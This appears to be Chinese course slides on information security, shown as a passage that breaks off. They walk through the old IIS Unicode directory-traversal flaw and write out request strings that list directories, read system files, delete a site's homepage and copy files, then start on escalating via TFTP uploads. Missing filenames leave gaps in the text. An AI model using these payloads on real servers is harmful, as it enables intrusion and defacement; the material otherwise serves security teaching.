文档介绍:信息安全技术课件
权限提升
有时候,管理员为了安全,给其他用户建立一个普通用户帐号,认为这样就安全了。
其实不然,用普通用户帐号登录后,。
的检测方法
可以看出,存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如:
/scripts/..%c0%2f../winnt/system32/?/c+dir
其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图5-19所示。
Unicode漏洞的检测方法
scripts目录一般系统盘根目录下的Inetpub目录下,如图5-20所示。
Unicode漏洞的检测方法
在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,,可以利用该文件新建用户,删除文件等操作。
浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。比如 “/scripts/..%c0%2f../winnt/system32/?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。
Unicode漏洞
+SP6开始,还影响中文WIN2000+、中文WIN2000++SP1,台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。
但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。
%c1%pc
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入
“/..%c0%2f../winnt/system32/?/c+dir+c:\”
利用Unicode漏洞读取系统盘目录
利用Unicode漏洞读取系统盘目录
利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,。使用的语句是:
/..%c0%2f../winnt/system32/?/c+type+c:\
执行的结果如图5-22所示。
利用Unicode漏洞删除主页
利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“”来删除主页,这里的“”文件是IIS的默认启动页面。
使用的语句是:
/..%c0%2f../winnt/system32/?/c+del+c:\inetpub\wwwroot\
利用Unicode漏洞删除主页
拷贝文件
为了是使用方便,,,使用的语句是:
/..%c0%2f../winnt/system32/?/c+copy+C:\winnt\system32\+
程序执行结果如图5-24所示。
查看C盘的目录
,比如查看C盘的目录,使用的语句就可以简化为:
?/c+dir+c:\
执行的结果如图5-25所示。
利用Unicode漏洞入侵系统
在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统,并得到管理员权限。首先需要向对方服务器上传一些文件,入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。
需要上传一个名为“”的文件,为了上传这个文件,首先在本地计算机上搭建一个TFTP服务器,普通